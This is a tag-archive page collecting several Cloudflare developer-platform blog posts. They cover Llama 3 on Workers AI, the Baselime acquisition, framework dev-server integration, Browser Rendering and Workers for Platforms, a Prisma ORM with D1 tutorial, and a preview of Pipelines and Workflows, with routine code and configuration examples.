Tag Archives: Developer Platform

Meta Llama 3 available on Cloudflare Workers AI

Post Syndicated from Michelle Chen original https://blog.cloudflare.com/meta-llama-3-available-on-cloudflare-workers-ai

Workers AI

Workers AI’s initial launch in beta included support for Llama 2, as it was one of the most requested open source models from the developer community. Since that initial launch, we’ve seen developers build all kinds of innovative applications including knowledge sharing chatbots, creative content generation, and automation for various workflows.  

At Cloudflare, we know developers want simplicity and flexibility, with the ability to build with multiple AI models while optimizing for accuracy, performance, and cost, among other factors. Our goal is to make it as easy as possible for developers to use their models of choice without having to worry about the complexities of hosting or deploying models.

As soon as we learned about the development of Llama 3 from our partners at Meta, we knew developers would want to start building with it as quickly as possible. Workers AI’s serverless inference platform makes it extremely easy and cost effective to start using the latest large language models (LLMs). Meta’s commitment to developing and growing an open AI-ecosystem makes it possible for customers of all sizes to use AI at scale in production. All it takes is a few lines of code to run inference to Llama 3:

export interface Env {
  // If you set another name in wrangler.toml as the value for 'binding',
  // replace "AI" with the variable name you defined.
  AI: any;

export default {
  async fetch(request: Request, env: Env) {
    const response = await env.AI.run('@cf/meta/llama-3-8b-instruct', {
        messages: [
{role: "user", content: "What is the origin of the phrase Hello, World?"}

    return new Response(JSON.stringify(response));

Built with Meta Llama 3

Llama 3 offers leading performance on a wide range of industry benchmarks. You can learn more about the architecture and improvements on Meta’s blog post. Cloudflare Workers AI supports Llama 3 8B, including the instruction fine-tuned model.

Meta’s testing shows that Llama 3 is the most advanced open LLM today on evaluation benchmarks such as MMLU, GPQA, HumanEval, GSM-8K, and MATH. Llama 3 was trained on an increased number of training tokens (15T), allowing the model to have a better grasp on language intricacies. Larger context windows doubles the capacity of Llama 2, and allows the model to better understand lengthy passages with rich contextual data. Although the model supports a context window of 8k, we currently only support 2.8k but are looking to support 8k context windows through quantized models soon. As well, the new model introduces an efficient new tiktoken-based tokenizer with a vocabulary of 128k tokens, encoding more characters per token, and achieving better performance on English and multilingual benchmarks. This means that there are 4 times as many parameters in the embedding and output layers, making the model larger than the previous Llama 2 generation of models.

Under the hood, Llama 3 uses grouped-query attention (GQA), which improves inference efficiency for longer sequences and also renders their 8B model architecturally equivalent to Mistral-7B. For tokenization, it uses byte-level byte-pair encoding (BPE), similar to OpenAI’s GPT tokenizers. This allows tokens to represent any arbitrary byte sequence — even those without a valid utf-8 encoding. This makes the end-to-end model much more flexible in its representation of language, and leads to improved performance.

Along with the base Llama 3 models, Meta has released a suite of offerings with tools such as Llama Guard 2, Code Shield, and CyberSec Eval 2, which we are hoping to release on our Workers AI platform shortly.

Try it out now

Meta Llama 3 8B is available in the Workers AI Model Catalog today! Check out the documentation here and as always if you want to share your experiences or learn more, join us in the Developer Discord.

Cloudflare acquires Baselime to expand serverless application observability capabilities

Post Syndicated from Boris Tane original https://blog.cloudflare.com/cloudflare-acquires-baselime-expands-observability-capabilities

Today, we’re thrilled to announce that Cloudflare has acquired Baselime.

The cloud is changing. Just a few years ago, serverless functions were revolutionary. Today, entire applications are built on serverless architectures, from compute to databases, storage, queues, etc. — with Cloudflare leading the way in making it easier than ever for developers to build, without having to think about their architecture. And while the adoption of serverless has made it simple for developers to run fast, it has also made one of the most difficult problems in software even harder: how the heck do you unravel the behavior of distributed systems?

When I started Baselime 2 years ago, our goal was simple: enable every developer to build, ship, and learn from their serverless applications such that they can resolve issues before they become problems.

Since then, we built an observability platform that enables developers to understand the behaviour of their cloud applications. It’s designed for high cardinality and dimensionality data, from logs to distributed tracing with OpenTelemetry. With this data, we automatically surface insights from your applications, and enable you to quickly detect, troubleshoot, and resolve issues in production.

In parallel, Cloudflare has been busy the past few years building the next frontier of cloud computing: the connectivity cloud. The team is building primitives that enable developers to build applications with a completely new set of paradigms, from Workers to D1, R2, Queues, KV, Durable Objects, AI, and all the other services available on the Cloudflare Developers Platform.

This synergy makes Cloudflare the perfect home for Baselime. Our core mission has always been to simplify and innovate around observability for the future of the cloud, and Cloudflare’s ecosystem offers the ideal ground to further this cause. With Cloudflare, we’re positioned to deeply integrate into a platform that tens of thousands of developers trust and use daily, enabling them to quickly build, ship, and troubleshoot applications. We believe that every Worker, Queue, KV, Durable Object, AI call, etc. should have built-in observability by default.

That’s why we’re incredibly excited about the potential of what we can build together and the impact it will have on developers around the world.

To give you a preview into what’s ahead, I wanted to dive deeper into the 3 core concepts we followed while building Baselime.

High Cardinality and Dimensionality

Cardinality and dimensionality are best described using examples. Imagine you’re playing a board game with a deck of cards. High cardinality is like playing a game where every card is a unique character, making it hard to remember or match them. And high dimensionality is like each card has tons of details like strength, speed, magic, aura, etc., making the game’s strategy complex because there’s so much to consider.

This also applies to the data your application emits. For example, when you log an HTTP request that makes database calls.

  • High cardinality means that your logs can have a unique userId or requestId (which can take millions of distinct values). Those are high cardinality fields.
  • High dimensionality means that your logs can have thousands of possible fields. You can record each HTTP header of your request and the details of each database call. Any log can be a key-value object with thousands of individual keys.

The ability to query on high cardinality and dimensionality fields is key to modern observability. You can surface all errors or requests for a specific user, compute the duration of each of those requests, and group by location. You can answer all of those questions with a single tool.


OpenTelemetry provides a common set of tools, APIs, SDKs, and standards for instrumenting applications. It is a game-changer for debugging and understanding cloud applications. You get to see the big picture: how fast your HTTP APIs are, which routes are experiencing the most errors, or which database queries are slowest. You can also get into the details by following the path of a single request or user across your entire application.

Baselime is OpenTelemetry native, and it is built from the ground up to leverage OpenTelemetry data. To support this, we built a set of OpenTelemetry SDKs compatible with several serverless runtimes.

Cloudflare is building the cloud of tomorrow and has developed workerd, a modern JavaScript runtime for Workers. With Cloudflare, we are considering embedding OpenTelemetry directly in the Workers’ runtime. That’s one more reason we’re excited to grow further at Cloudflare, enabling more developers to understand their applications, even in the most unconventional scenarios.

Developer Experience

Observability without action is just storage. I have seen too many developers pay for tools to store logs and metrics they never use, and the key reason is how opaque these tools are.

The crux of the issue in modern observability isn’t the technology itself, but rather the developer experience. Many tools are complex, with a significant learning curve. This friction reduces the speed at which developers can identify and resolve issues, ultimately affecting the reliability of their applications. Improving developer experience is key to unlocking the full potential of observability.

We built Baselime to be an exploratory solution that surfaces insights to you rather than requiring you to dig for them. For example, we notify you in real time when errors are discovered in your application, based on your logs and traces. You can quickly search through all of your data with full-text search, or using our powerful query engine, which makes it easy to correlate logs and traces for increased visibility, or ask our AI debugging assistant for insights on the issue you’re investigating.

It is always possible to go from one insight to another, asking questions about the state of your app iteratively until you get to the root cause of the issue you are troubleshooting.

Cloudflare has always prioritised the developer experience of its developer platform, especially with Wrangler, and we are convinced it’s the right place to solve the developer experience problem of observability.

What’s next?

Over the next few months, we’ll work to bring the core of Baselime into the Cloudflare ecosystem, starting with OpenTelemetry, real-time error tracking, and all the developer experience capabilities that make a great observability solution. We will keep building and improving observability for applications deployed outside Cloudflare because we understand that observability should work across providers.

But we don’t want to stop there. We want to push the boundaries of what modern observability looks like. For instance, directly connecting to your codebase and correlating insights from your logs and traces to functions and classes in your codebase. We also want to enable more AI capabilities beyond our debugging assistant. We want to deeply integrate with your repositories such that you can go from an error in your logs and traces to a Pull Request in your codebase within minutes.

We also want to enable everyone building on top of Large Language Models to do all your LLM observability directly within Cloudflare, such that you can optimise your prompts, improve latencies and reduce error rates directly within your cloud provider. These are just a handful of capabilities we can now build with the support of the Cloudflare platform.


We are incredibly thankful to our community for its continued support, from day 0 to today. With your continuous feedback, you’ve helped us build something we’re incredibly proud of.

To all the developers currently using Baselime, you’ll be able to keep using the product and will receive ongoing support. Also, we are now making all the paid Baselime features completely free.

Baselime products remain available to sign up for while we work on integrating with the Cloudflare platform. We anticipate sunsetting the Baselime products towards the end of 2024 when you will be able to observe all of your applications within the Cloudflare dashboard. If you’re interested in staying up-to-date on our work with Cloudflare, we will release a signup link in the coming weeks!

We are looking forward to continuing to innovate with you.

Blazing fast development with full-stack frameworks and Cloudflare

Post Syndicated from Igor Minar original https://blog.cloudflare.com/blazing-fast-development-with-full-stack-frameworks-and-cloudflare

Hello web developers! Last year we released a slew of improvements that made deploying web applications on Cloudflare much easier, and in response we’ve seen a large growth of Astro, Next.js, Nuxt, Qwik, Remix, SolidStart, SvelteKit, and other web apps hosted on Cloudflare. Today we are announcing major improvements to our integration with these web frameworks that makes it easier to develop sophisticated applications that use our D1 SQL database, R2 object store, AI models, and other powerful features of Cloudflare’s developer platform.

In the past, if you wanted to develop a web framework-powered application with D1 and run it locally, you’d have to build a production build of your application, and then run it locally using `wrangler pages dev`. While this worked, each of your code iterations would take seconds, or tens of seconds for big applications. Iterating using production builds is simply too slow, pulls you out of the flow, and doesn’t allow you to take advantage of all the DX optimizations that framework authors have put a lot of hard work into. This is changing today!

Our goal is to integrate with web frameworks in the most natural way possible, without developers having to learn and adopt significant workflow changes or custom APIs when deploying their app to Cloudflare. Whether you are a Next.js developer, a Nuxt developer, or prefer another framework, you can now keep on using the blazing fast local development workflow familiar to you, and ship your application on Cloudflare.

All full-stack web frameworks come with a local development server (dev server) that is custom tailored to the framework and often provides an excellent development experience, with only one exception — they don’t natively support some important features of Cloudflare’s development platform, especially our storage solutions.

So up until recently, you had to make a tough choice. You could use the framework-specific dev server to develop your application, but forgo access to many of Cloudflare’s features. Alternatively, you could take full advantage of Cloudflare’s platform including various resources like D1 or R2, but you would have to give up using the framework specific developer tooling. In that case, your iteration cycle would slow down, and it would take seconds rather than milliseconds for you to see results of your code changes in the browser. But not anymore! Let’s take a look.

Let’s build an application

Let’s create a new application using C3 — our create-cloudflare CLI. We could use any npm client of our choice (pnpm anyone?!?), but to keep things simple in this post, we’ll stick with the default npm client. To get started, just run:

$ npm create cloudflare@latest

Provide a name for your app, or stick with the randomly generated one. Then select the “Website or web app” category, and pick a full-stack framework of your choice. We support many: Astro, Next.js, Nuxt, Qwik, Remix, SolidStart, and SvelteKit.

Since C3 delegates the application scaffolding to the latest version of the framework-specific CLI, you will scaffold the application exactly as the framework authors intended without missing out on any of the framework features or options. C3 then adds to your application everything necessary for integrating and deploying to Cloudflare so that you don’t have to configure it yourself.

With our application scaffolded, let’s get it to display a list of products stored in a database with just a few steps. First, we add the configuration for our database to our wrangler.toml config file:

binding = "DB"
database_name = "blog-products-db"
database_id = "XXXXXXXXXXXXXXXX"

Yes, that’s right! You can now configure your bound resources via the wrangler.toml file, even for full-stack apps deployed to Pages. We’ll share much more about configuration enhancements to Pages in a dedicated announcement.

Now let’s create a simple schema.sql file representing our database schema:

CREATE TABLE products(product_id INTEGER PRIMARY KEY, name TEXT, price INTEGER);
INSERT INTO products (product_id, name, price) VALUES (1, 'Apple', 250), (2, 'Banana', 100), (3, 'Cherry', 375);

And initialize our database:

$ npx wrangler d1 execute blog-products-db --local --file schema.sql

Notice that we used the –local flag of wrangler d1 execute to apply the changes to our local D1 database. This is the database that our dev server will connect to.

Next, if you use TypeScript, let TypeScript know about your database by running:

$ npm run build-cf-types

This command is preconfigured for all full-stack applications created via C3 and executes wrangler types to update the interface of Cloudflare’s environment containing all configured bindings.

We can now start the dev server provided by your framework via a handy shortcut:

$ npm run dev

This shortcut will start your framework’s dev server, whether it’s powered by next dev, nitro, or vite.

Now to access our database and list the products, we can now use a framework specific approach. For example, in a Next.js application that uses the App router, we could update app/api/hello/route.ts with the following:

const db = getRequestContext().env.DB;
 const productsResults = await db.prepare('SELECT * FROM products').all();
 return Response.json(productsResults.results);

Or in a Nuxt application, we can create a server/api/hello.ts file and populate it with:

export default defineEventHandler(async ({ context }) => {
   const db = context.cloudflare.env.DB;
   const productsResults = await db.prepare('SELECT * FROM products').all();
   return productsResults.results;

Assuming that the framework dev server is running on port 3000, you can test the new API route in either framework by navigating to http://localhost:3000/api/hello. For simplicity, we picked API routes in these examples, but the same applies to any UI-generating routes as well.

Each web framework has its own way to define routes and pass contextual information about the request throughout the application, so how you access your databases, object stores, and other resources will depend on your framework. You can read our updated full-stack framework guides to learn more:

Now that you know how to access Cloudflare’s resources in the framework of your choice, everything else you know about your framework remains the same. You can now develop your application locally, using the development server optimized for your framework, which often includes support for hot module replacement (HMR), custom dev tools, enhanced debugging support and more, all while still benefiting from Cloudflare-specific APIs and features. Win-win!

What has actually changed to enable these development workflows?

To decrease the development latency and preserve the custom framework-specific experiences, we needed to enable web frameworks and their dev servers to integrate with wrangler and miniflare in a seamless, almost invisible way.

Miniflare is a key component in this puzzle. It is our local simulator for Cloudflare-specific resources, which is powered by workerd, our JavaScript (JS) runtime. By relying on workerd, we ensure that Cloudflare’s JavaScript APIs run locally in a way that faithfully simulates our production environment. The trouble is that framework dev servers already rely on Node.js to run the application, so bringing another JS runtime into the mix breaks many assumptions in how these dev servers have been architected.

Our team however came up with an interesting approach to bridging the gap between these two JS runtimes. We call it the getPlatformProxy() API, which is now part of wrangler and is super-powered by miniflare’s magic proxy. This API exposes a JS proxy object that behaves just like the usual Workers env object containing all bound resources. The proxy object enables code from Node.js to transparently invoke JavaScript code running in workerd, as well access Cloudflare-specific runtime APIs.

With this bridge between the Node.js and workerd runtimes, your application can now access Cloudflare simulators for D1, R2, KV and other storage solutions directly while running in a dev server powered by Node.js. Or you could even write an Node.js script to do the same:

 import {getPlatformProxy} from 'wrangler';

 const {env} = getPlatformProxy();
 const db = env.DB;

 // Now let’s execute a DB query that runs in a local D1 db
 // powered by miniflare/workerd and access the result from Node.js
 const productsResults = await db.prepare('SELECT * FROM products').all();

With the getPlatformProxy() API available, the remaining work was all about updating all framework adapters, plugins, and in some cases frameworks themselves to make use of this API. We are grateful for the support we received from framework teams on this journey, especially Alex from Astro, pi0 from Nuxt, Pedro from Remix, Ryan from Solid, Ben and Rich from Svelte, and our collaborator on the next-on-pages project, James Anderson.

Future improvements to development workflows with Vite

While the getPlatformProxy() API is a good solution for many scenarios, we can do better. If we could run the entire application in our JS runtime rather than Node.js, we could even more faithfully simulate the production environment and reduce developer friction and production surprises.

In the ideal world, we’d like you to develop against the same runtime that you deploy to in production, and this can only be achieved by integrating workerd directly into the dev servers of all frameworks, which is not a small feat considering the number of frameworks out there and the differences between them.

We however got a bit lucky. As we kicked off this effort, we quickly realized that Vite, a popular dev server used by many full-stack frameworks, was gaining increasingly greater adoption. In fact, Remix switched over to Vite just recently and confirmed the popularity of Vite as the common foundation for web development today.

If Vite had first-class support for running a full-stack application in an alternative JavaScript runtime, we could enable anyone using Vite to develop their applications locally with complete access to the Cloudflare developer platform. No more framework specific custom integrations and workarounds — all the features of a full-stack framework, Vite, and Cloudflare accessible to all developers.

Sounds too good to be true? Maybe. We are very stoked to be working with the Vite team on the Vite environments proposal, which could enable just that. This proposal is still evolving, so stay tuned for updates.

What will you build today?

We aim to make Cloudflare the best development platform for web developers. Making it quick and easy to develop your application with frameworks and tools you are already familiar with is a big part of our story. Start your journey with us by running a single command:

$ npm create cloudflare@latest

Browser Rendering API GA, rolling out Cloudflare Snippets, SWR, and bringing Workers for Platforms to all users

Post Syndicated from Tanushree Sharma original https://blog.cloudflare.com/browser-rendering-api-ga-rolling-out-cloudflare-snippets-swr-and-bringing-workers-for-platforms-to-our-paygo-plans

Browser Rendering API is now available to all paid Workers customers with improved session management

In May 2023, we announced the open beta program for the Browser Rendering API. Browser Rendering allows developers to programmatically control and interact with a headless browser instance and create automation flows for their applications and products.

At the same time, we launched a version of the Puppeteer library that works with Browser Rendering. With that, developers can use a familiar API on top of Cloudflare Workers to create all sorts of workflows, such as taking screenshots of pages or automatic software testing.

Today, we take Browser Rendering one step further, taking it out of beta and making it available to all paid Workers’ plans. Furthermore, we are enhancing our API and introducing a new feature that we’ve been discussing for a long time in the open beta community: session management.

Session Management

Session management allows developers to reuse previously opened browsers across Worker’s scripts. Reusing browser sessions has the advantage that you don’t need to instantiate a new browser for every request and every task, drastically increasing performance and lowering costs.

Before, to keep a browser instance alive and reuse it, you’d have to implement complex code using Durable Objects. Now, we’ve simplified that for you by keeping your browsers running in the background and extending the Puppeteer API with new session management methods that give you access to all of your running sessions, activity history, and active limits.

Here’s how you can list your active sessions:

const sessions = await puppeteer.sessions(env.RENDERING);
      "connectionId": "2a2246fa-e234-4dc1-8433-87e6cee80145",
      "connectionStartTime": 1711621704607,
      "sessionId": "478f4d7d-e943-40f6-a414-837d3736a1dc",
      "startTime": 1711621703708
      "sessionId": "565e05fb-4d2a-402b-869b-5b65b1381db7",
      "startTime": 1711621703808

We have added a Worker script example on how to use session management to the Developer Documentation.

Analytics and logs

Observability is an essential part of any Cloudflare product. You can find detailed analytics and logs of your Browser Rendering usage in the dashboard under your account’s Worker & Pages section.

Browser Rendering is now available to all customers with a paid Workers plan. Each account is limited to running two new browsers per minute and two concurrent browsers at no cost during this period. Check our developers page to get started.

We are rolling out access to Cloudflare Snippets

Powerful, programmable, and free of charge, Snippets are the best way to perform complex HTTP request and response modifications on Cloudflare. What was once too advanced to achieve using Rules products is now possible with Snippets. Since the initial announcement during Developer Week 2022, the promise of extending out-of-the-box Rules functionality by writing simple JavaScript code is keeping the Cloudflare community excited.

During the first 3 months of 2024 alone, the amount of traffic going through Snippets increased over 7x, from an average of 2,200 requests per second in early January to more than 17,000 in March.

However, instead of opening the floodgates and letting millions of Cloudflare users in to test (and potentially break) Snippets in the most unexpected ways, we are going to pace ourselves and opt for a phased rollout, much like the newly released Gradual Rollouts for Workers.

In the next few weeks, 5% of Cloudflare users will start seeing “Snippets” under the Rules tab of the zone-level menu in their dashboard. If you happen to be part of the first 5%, snip into action and try out how fast and powerful Snippets are even for advanced use cases like dynamically changing the date in headers or A / B testing leveraging the `math.random` function. Whatever you use Snippets for, just keep one thing in mind: this is still an alpha, so please do not use Snippets for production traffic just yet.

Until then, keep your eyes out for the new Snippets tab in the Cloudflare dashboard and learn more how powerful and flexible Snippets are at the developer documentation in the meantime.

Coming soon: asynchronous revalidation with stale-while-revalidate

One of the features most requested by our customers is the asynchronous revalidation with stale-while-revalidate (SWR) cache directive, and we will be bringing this to you in the second half of 2024.  This functionality will be available by design as part of our new CDN architecture that is being built using Rust with performance and memory safety at top of mind.

Currently, when a client requests a resource, such as a web page or an image, Cloudflare checks to see if the asset is in cache and provides a cached copy if available. If the file is not in the cache or has expired and become stale, Cloudflare connects to the origin server to check for a fresh version of the file and forwards this fresh version to the end user. This wait time adds latency to these requests and impacts performance.

Stale-while-revalidate is a cache directive that allows the expired or stale version of the asset to be served to the end user while simultaneously allowing Cloudflare to check the origin to see if there’s a fresher version of the resource available. If an updated version exists, the origin forwards it to Cloudflare, updating the cache in the process. This mechanism allows the client to receive a response quickly from the cache while ensuring that it always has access to the most up-to-date content. Stale-while-revalidate strikes a balance between serving content efficiently and ensuring its freshness, resulting in improved performance and a smoother user experience.

Customers who want to be part of our beta testers and “cache” in on the fun can register here, and we will let you know when the feature is ready for testing!

Coming on April 16, 2024: Workers for Platforms for our pay-as-you-go plan

Today, we’re excited to share that on April 16th, Workers for Platforms will be available to all developers through our new $25 pay-as-you-go plan!

Workers for Platforms is changing the way we build software – it gives you the ability to embed personalization and customization directly into your product. With Workers for Platforms, you can deploy custom code on behalf of your users or let your users directly deploy their own code to your platform, without you or your users having to manage any infrastructure. You can use Workers for Platforms with all the exciting announcements that have come out this Developer Week – it supports all the bindings that come with Workers (including Workers AI, D1 and Durable Objects) as well as Python Workers.  

Here’s what some of our customers – ranging from enterprises to startups – are building on Workers for Platforms:

  • Shopify Oxygen is a hosting platform for their Remix-based eCommerce framework Hydrogen, and it’s built on Workers for Platforms! The Hydrogen/Oxygen combination gives Shopify merchants control over their buyer experience without the restrictions of generic storefront templates.
  • Grafbase is a data platform for developers to create a serverless GraphQL API that unifies data sources across a business under one endpoint. They use Workers for Platforms to give their developers the control and flexibility to deploy their own code written in JavaScript/TypeScript or WASM.
  • Triplit is an open-source database that syncs data between server and browser in real-time. It allows users to build low latency, real-time applications with features like relational querying, schema management and server-side storage built in. Their query and sync engine is built on top of Durable Objects, and they’re using Workers for Platforms to allow their customers to package custom Javascript alongside their Triplit DB instance.

Tools for observability and platform level controls

Workers for Platforms doesn’t just allow you to deploy Workers to your platform – we also know how important it is to have observability and control over your users’ Workers. We have a few solutions that help with this:

  • Custom Limits: Set CPU time or subrequest caps on your users’ Workers. Can be used to set limits in order to control your costs on Cloudflare and/or shape your own pricing and packaging model. For example, if you run a freemium model on your platform, you can lower the CPU time limit for customers on your free tier.
  • Tail Workers: Tail Worker events contain metadata about the Worker, console.log() messages, and capture any unhandled exceptions. They can be used to provide your developers with live logging in order to monitor for errors and troubleshoot in real time.
  • Outbound Workers: Get visibility into all outgoing requests from your users’ Workers. Outbound Workers sit between user Workers and the fetch() requests they make, so you get full visibility over the request before it’s sent out to the Internet.


We wanted to make sure that Workers for Platforms was affordable for hobbyists, solo developers, and indie developers. Workers for Platforms is part of a new $25 pay-as-you-go plan, and it includes the following:

Included Amounts
Requests 20 million requests/month
+$0.30 per additional million
CPU time 60 million CPU milliseconds/month
+$0.02 per additional million CPU milliseconds
Scripts 1000 scripts
+0.02 per additional script/month

Workers for Platforms will be available to purchase on April 16, 2024!

The Workers for Platforms will be available to purchase under the Workers for Platforms tab on the Cloudflare Dashboard on April 16, 2024.

In the meantime, to learn more about Workers for Platforms, check out our starter project and developer documentation.

Improving Cloudflare Workers and D1 developer experience with Prisma ORM

Post Syndicated from Jon Harrell (Guest Author) original https://blog.cloudflare.com/prisma-orm-and-d1

Working with databases can be difficult. Developers face increasing data complexity and needs beyond simple create, read, update, and delete (CRUD) operations. Unfortunately, these issues also compound on themselves: developers have a harder time iterating in an increasingly complex environment. Cloudflare Workers and D1 help by reducing time spent managing infrastructure and deploying applications, and Prisma provides a great experience for your team to work and interact with data.  

Together, Cloudflare and Prisma make it easier than ever to deploy globally available apps with a focus on developer experience. To further that goal, Prisma Object Relational Mapper (ORM) now natively supports Cloudflare Workers and D1 in Preview. With version 5.12.0 of Prisma ORM you can now interact with your data stored in D1 from your Cloudflare Workers with the convenience of the Prisma Client API. Learn more and try it out now.

What is Prisma?

From writing to debugging, SQL queries take a long time and slow developer productivity. Even before writing queries, modeling tables can quickly become unwieldy, and migrating data is a nerve-wracking process. Prisma ORM looks to resolve all of these issues by providing an intuitive data modeling language, an automated migration workflow, and a developer-friendly and type-safe client for JavaScript and TypeScript, allowing developers to focus on what they enjoy: developing!

Prisma is focused on making working with data easy. Alongside an ORM, Prisma offers Accelerate and Pulse, products built on Cloudflare that cover needs from connection pooling, to query caching, to real-time type-safe database subscriptions.

How to get started with Prisma ORM, Cloudflare Workers, and D1

To get started with Prisma ORM and D1, first create a basic Cloudflare Workers app. This guide will start with the ”Hello World” Worker example app, but any Workers example app will work. If you don’t have a project yet, start by creating a new one. Name your project something memorable, like my-d1-prisma-app and select “Hello World” worker and TypeScript. For now, we will choose to not deploy and will wait until after we have set up D1 and Prisma ORM.

npm create cloudflare@latest

Next, move into your newly created project and make sure that dependencies are installed:

cd my-d1-prisma-app && npm install

After dependencies are installed, we can move on to the D1 setup.

First, create a new D1 database for your app.

npx wrangler d1 create prod-prisma-d1-app

binding = "DB" # i.e. available in your Worker on env.DB
database_name = "prod-prisma-d1-app"
database_id = "<unique-ID-for-your-database>"

The section starting with [[d1_databases]] is the binding configuration needed in your wrangler.toml for your Worker to communicate with D1. Add that now:

// wrangler.toml
main = "src/index.ts"
compatibility_date = "2024-03-20"
compatibility_flags = ["nodejs_compat"]

binding = "DB" # i.e. available in your Worker on env.DB
database_name = "prod-prisma-d1-app"
database_id = "<unique-ID-for-your-database>"

Your application now has D1 available! Next, add Prisma ORM to manage your queries, schema and migrations! To add Prisma ORM, first make sure the latest version is installed. Prisma ORM versions 5.12.0 and up support Cloudflare Workers and D1.

npm install prisma@latest @prisma/client@latest @prisma/adapter-d1

Now run npx prisma init in order to create the necessary files to start with. Since D1 uses SQLite’s SQL dialect, we set the provider to be sqlite.

npx prisma init --datasource-provider sqlite

This will create a few files, but the one to look at first is your Prisma schema file, available at prisma/schema.prisma

// schema.prisma
// This is your Prisma schema file,
// learn more about it in the docs: https://pris.ly/d/prisma-schema

generator client {
  provider = "prisma-client-js"

datasource db {
  provider = "sqlite"
  url  = env("DATABASE_URL")

Before you can create any models, first enable the driverAdapters Preview feature. This will allow the Prisma Client to use an adapter to communicate with D1.

// schema.prisma
// This is your Prisma schema file,
// learn more about it in the docs: https://pris.ly/d/prisma-schema

generator client {
  provider = "prisma-client-js"
+ previewFeatures = ["driverAdapters"]

datasource db {
  provider = "sqlite"
  url      = env("DATABASE_URL")

Now you are ready to create your first model! In this app, you will be creating a “ticker”, a mainstay of many classic Internet sites.

Add a new model to your schema, Visit, which will track that an individual visited your site. A Visit is a simple model that will have a unique ID and the time at which an individual visited your site.

// This is your Prisma schema file,
// learn more about it in the docs: https://pris.ly/d/prisma-schema

generator client {
  provider        = "prisma-client-js"
  previewFeatures = ["driverAdapters"]

datasource db {
  provider = "sqlite"
  url      = env("DATABASE_URL")

+ model Visit {
+   id        Int      @id @default(autoincrement())
+   visitTime DateTime @default(now())
+ }

Now that you have a schema and a model, let’s create a migration. First use wrangler to generate an empty migration file and prisma migrate to fill it. If prompted, select “yes” to create a migrations folder at the root of your project.

npx wrangler d1 migrations create prod-prisma-d1-app init
 ⛅️ wrangler 3.36.0
✔ No migrations folder found. Set `migrations_dir` in wrangler.toml to choose a different path.
Ok to create /path/to/your/project/my-d1-prisma-app/migrations? … yes
✅ Successfully created Migration '0001_init.sql'!

The migration is available for editing here
npx prisma migrate diff --script --from-empty --to-schema-datamodel ./prisma/schema.prisma >> migrations/0001_init.sql

The npx prisma migrate diff command takes the difference between your database (which is currently empty) and the Prisma schema. It then saves this difference to a new file in the migrations directory.

// 0001_init.sql
-- Migration number: 0001 	 2024-03-21T22:15:50.184Z
-- CreateTable

Now you can migrate your local and remote D1 database instances using wrangler and re-generate your Prisma Client to begin making queries.

npx wrangler d1 migrations apply prod-prisma-d1-app --local
npx wrangler d1 migrations apply prod-prisma-d1-app --remote
npx prisma generate

Make sure to import PrismaClient and PrismaD1, define the binding for your D1 database, and you’re ready to use Prisma in your application.

// src/index.ts
import { PrismaClient } from "@prisma/client";
import { PrismaD1 } from "@prisma/adapter-d1";

export interface Env {
  DB: D1Database,

export default {
  async fetch(request: Request, env: Env, ctx: ExecutionContext): Promise<Response> {
    const adapter = new PrismaD1(env.DB);
    const prisma = new PrismaClient({ adapter });
    const { pathname } = new URL(request.url);

    if (pathname === '/') {
      const numVisitors = await prisma.visit.count();
      return new Response(
        `You have had ${numVisitors} visitors!`

    return new Response('');

You may notice that there’s always 0 visitors. Add another route to create a new visitor whenever someone visits the /visit route

// src/index.ts
import { PrismaClient } from "@prisma/client";
import { PrismaD1 } from "@prisma/adapter-d1";

export interface Env {
  DB: D1Database,

export default {
  async fetch(request: Request, env: Env, ctx: ExecutionContext): Promise<Response> {
    const adapter = new PrismaD1(env.DB);
    const prisma = new PrismaClient({ adapter });
    const { pathname } = new URL(request.url);

    if (pathname === '/') {
      const numVisitors = await prisma.visit.count();
      return new Response(
        `You have had ${numVisitors} visitors!`
    } else if (pathname === '/visit') {
      const newVisitor = await prisma.visit.create({ data: {} });
      return new Response(
        `You visited at ${newVisitor.visitTime}. Thanks!`

    return new Response('');

Your app is now set up to record visits and report how many visitors you have had!

Summary and further reading

We were able to build a simple app easily with Cloudflare Workers, D1 and Prisma ORM, but the benefits don’t stop there! Check the official documentation for information on using Prisma ORM with D1 along with workflows for migrating your data, and even extending the Prisma Client for your specific needs.

Data Anywhere with Pipelines, Event Notifications, and Workflows

Post Syndicated from Matt Silverlock original https://blog.cloudflare.com/data-anywhere-events-pipelines-durable-execution-workflows

Data is fundamental to any real-world application: the database storing your user data and inventory, the analytics tracking sales events and/or error rates, the object storage with your web assets and/or the Parquet files driving your data science team, and the vector database enabling semantic search or AI-powered recommendations for your users.

When we first announced Workers back in 2017, and then Workers KV, Cloudflare R2, and D1, it was obvious that the next big challenge to solve for developers would be in making it easier to ingest, store, and query the data needed to build scalable, full-stack applications.

To that end, as part of our quest to make building stateful, distributed-by-default applications even easier, we’re launching our new Event Notifications service; a preview of our upcoming streaming ingestion product, Pipelines; and a sneak peek into our take on durable execution, Workflows.

Event-based architectures

When you’re writing data — whether that’s new data, changing existing data, or deleting old data — you often want to trigger other, asynchronous work to run in response. That could be processing user-driven uploads, updating search indexes as the underlying data changes, or removing associated rows in your SQL database when content is removed.

In order to make these event-driven workflows far easier to build across Cloudflare, we’re launching the first step towards a wider Event Notifications platform across Cloudflare, starting with notifications support in R2.

You can read more in the deep-dive on Event Notifications for R2, but in a nutshell: you can configure changes to content in any R2 bucket to write directly to a Queue, allowing you to reliably consume those events in a Worker or to pull from compute in a legacy cloud.

Event Notifications for R2 are just the beginning, though. There are many kinds of events you might want to trigger as a developer — these are just some of the event types we’re planning to support:

  • Changes (writes) to key-value pairs in your Workers KV namespaces.
  • Updates to your D1 databases, including changed rows or triggers.
  • Deployments to your Cloudflare Workers

Consuming event notifications from a single Worker is just one approach, though. As you start to consume events, you may want to trigger multi-step workflows that execute reliably, resume from errors or exceptions, and ensure that previous steps aren’t duplicated or repeated unnecessarily. An event notification framework turns out to be just the thing needed to drive a workflow engine that executes durably

Making it even easier to ingest data

When we launched Cloudflare R2, our object storage service, we knew that supporting the de facto-standard S3 API was critical in order to allow developers to bring the tooling and services they already had over to R2. But the S3 API is designed to be simple: at its core, it provides APIs for upload, download, multipart and metadata operations, and many tools don’t support the S3 API.

What if you want to batch clickstream data from your web services so that it’s efficient (and cost-effective) to query by your analytics team? Or partition data by customer ID, merchant ID, or locale within a structured data format like JSON?

Well, we want to help solve this problem too, and so we’re announcing Pipelines, an upcoming streaming ingestion service designed to ingest data at scale, aggregate it, and write it directly to R2, without you having to manage infrastructure, partitions, runners, or worry about durability.

With Pipelines, creating a globally scalable ingestion endpoint that can ingest tens-of-thousands of events per second doesn’t require any code:

